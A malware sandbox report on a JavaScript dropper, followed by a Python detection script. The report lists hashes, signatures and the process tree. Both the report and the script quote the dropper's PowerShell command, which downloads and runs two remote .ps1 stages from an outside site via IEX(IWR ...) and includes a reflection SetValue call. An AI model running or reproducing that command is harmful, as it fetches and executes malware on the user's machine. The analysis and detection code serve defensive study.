Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system -
submitted
06-06-2024 14:07
Static task
static1
Behavioral task
behavioral1
Sample
9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js
Resource
win7-20240221-en
6 signatures
150 seconds
General
-
Target
9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js
-
Size
1KB
-
MD5
e2e9bf7a7dcfe1d55a43229add47520b
-
SHA1
f668de5e1e1090b831a6e8d8f08a9107234ab77f
-
SHA256
9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c
-
SHA512
97eee0d2c2c71e53418323511599dc4a94f82633dff83b153a271eaa24b918a6c53544b20f51d3de4b2c5a4f0b442eb1edbb2706c9591463c1982f44e580deec
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
  pid   process
  2604  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
  description               pid   process
  Token: SeDebugPrivilege   2604  powershell.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
  description                        pid   process      target process
  PID 2188 wrote to memory of 2604   2188  wscript.exe  powershell.exe
  PID 2188 wrote to memory of 2604   2188  wscript.exe  powershell.exe
  PID 2188 wrote to memory of 2604   2188  wscript.exe  powershell.exe
  PID 2188 wrote to memory of 2604   2188  wscript.exe  powershell.exe
Processes
-
C:\Windows\system32\wscript.exe (PID 2188)
  wscript.exe C:\Users\Admin\AppData\Local\Temp\9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js
  - Suspicious use of WriteProcessMemory
  -
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2604, child of 2188)
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7zNMB3GWTLNX'; IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/piemagLI2X6.ps1'); $vv.SetValue($null, $true); IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/noncontrabandsVB1.ps1')"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
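The process tree above is the whole story of this sample: a .js dropper run by wscript.exe that launches 32-bit PowerShell with a two-stage IEX(IWR ...) download cradle. As an added example (not part of the sandbox report, and not the sandbox's own rule logic), the following Python script takes the two process records above as constructed sample input and flags what a detection engineer would key on: a script host spawning powershell.exe, PowerShell running from SysWOW64 on an x64 image, each download cradle with its URL, the reflection-style SetValue($null, $true) call, and the environment variable staged for the downloaded stages. The Proc/Finding types, rule names, and the parent PID of 0 for wscript.exe are this example's own assumptions; the comment on SetValue describes a commonly seen pattern, since the field $vv refers to is defined in the first downloaded stage, which the report does not include.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int      # 0 = parent not recorded (assumption for the root process)
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


# Constructed sample input: the two process records from the report above.
# PIDs come from the WriteProcessMemory IoCs; command lines are copied verbatim.
SAMPLE = [
    Proc(2188, 0, r"C:\Windows\system32\wscript.exe",
         r"wscript.exe C:\Users\Admin\AppData\Local\Temp\9e1c9678aa1a203879ea5e93fd18f2831f6168ebf2d1f62680091bc21fc4217c.js"),
    Proc(2604, 2188, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         r'''"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$env:paths = '7zNMB3GWTLNX'; IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/piemagLI2X6.ps1'); $vv.SetValue($null, $true); IEX(IWR -UseBasicParsing 'https://www.dsestimation.com/wp-content/uploads/2015/10/noncontrabandsVB1.ps1')"'''),
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# IEX( IWR ... ) / Invoke-Expression(Invoke-WebRequest ...) download-and-run cradle.
DOWNLOAD_CRADLE = re.compile(r"\b(?:IEX|Invoke-Expression)\s*\(\s*(?:IWR|Invoke-WebRequest)\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
ENV_ASSIGN = re.compile(r"\$env:(\w+)\s*=\s*'([^']*)'")
# Static-field write via reflection: first argument $null means "no instance".
# Commonly seen in AMSI-bypass one-liners; which field is set here is decided by
# the first downloaded stage, which this report does not contain (assumption).
REFLECT_SETVALUE = re.compile(r"\.SetValue\(\s*\$null\s*,\s*\$true\s*\)", re.IGNORECASE)


def basename(path: str) -> str:
    """Image file name, lower-cased, regardless of slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_urls(cmdline: str) -> list[str]:
    return URL_RE.findall(cmdline)


def analyse(procs: list[Proc]) -> list[Finding]:
    """Run the behavioural rules over a process list and return every hit."""
    by_pid = {p.pid: p for p in procs}
    findings: list[Finding] = []
    for p in procs:
        name = basename(p.image)
        parent = by_pid.get(p.ppid)
        if name == "powershell.exe":
            if parent and basename(parent.image) in SCRIPT_HOSTS:
                findings.append(Finding(p.pid, "script_host_spawns_powershell",
                                        f"parent {parent.pid} {basename(parent.image)}"))
            if "\\syswow64\\" in p.image.lower():
                findings.append(Finding(p.pid, "wow64_powershell",
                                        "32-bit PowerShell on a 64-bit image"))
        cradles = DOWNLOAD_CRADLE.findall(p.cmdline)
        if cradles:
            findings.append(Finding(p.pid, "download_cradle",
                                    f"{len(cradles)} IEX(IWR ...) stage(s): {', '.join(extract_urls(p.cmdline))}"))
        if REFLECT_SETVALUE.search(p.cmdline):
            findings.append(Finding(p.pid, "static_field_set_via_reflection",
                                    "SetValue($null, $true) between stage 1 and stage 2"))
        for var, val in ENV_ASSIGN.findall(p.cmdline):
            findings.append(Finding(p.pid, "env_var_staged", f"$env:{var} = {val!r}"))
    return findings


def iocs(procs: list[Proc]) -> dict:
    """Network indicators worth blocking: distinct stage URLs and their hosts."""
    urls: list[str] = []
    for p in procs:
        for u in extract_urls(p.cmdline):
            if u not in urls:
                urls.append(u)
    hosts = sorted({urlparse(u).hostname for u in urls})
    return {"urls": urls, "hosts": hosts}


if __name__ == "__main__":
    for f in analyse(SAMPLE):
        print(f"pid {f.pid}  {f.rule:36} {f.detail}")
    print(iocs(SAMPLE))
```

The parent-child check is the rule that carries most of the weight: PowerShell launched directly from wscript.exe with a -command string is rare in legitimate use, whereas each of the other hits (SysWOW64 PowerShell, an $env: assignment) can occur benignly on its own. The URL extraction stops at the closing quote or parenthesis, so the two stage URLs come out exactly as the report shows them.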
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
memory/2604-3-0x0000000073BD1000-0x0000000073BD2000-memory.dmp  Filesize 4KB
-
memory/2604-4-0x0000000073BD0000-0x000000007417B000-memory.dmp  Filesize 5.7MB
-
memory/2604-5-0x0000000073BD0000-0x000000007417B000-memory.dmp  Filesize 5.7MB
-
memory/2604-7-0x0000000073BD0000-0x000000007417B000-memory.dmp  Filesize 5.7MB
-
memory/2604-6-0x0000000073BD0000-0x000000007417B000-memory.dmp  Filesize 5.7MB
-
memory/2604-8-0x0000000073BD0000-0x000000007417B000-memory.dmp  Filesize 5.7MB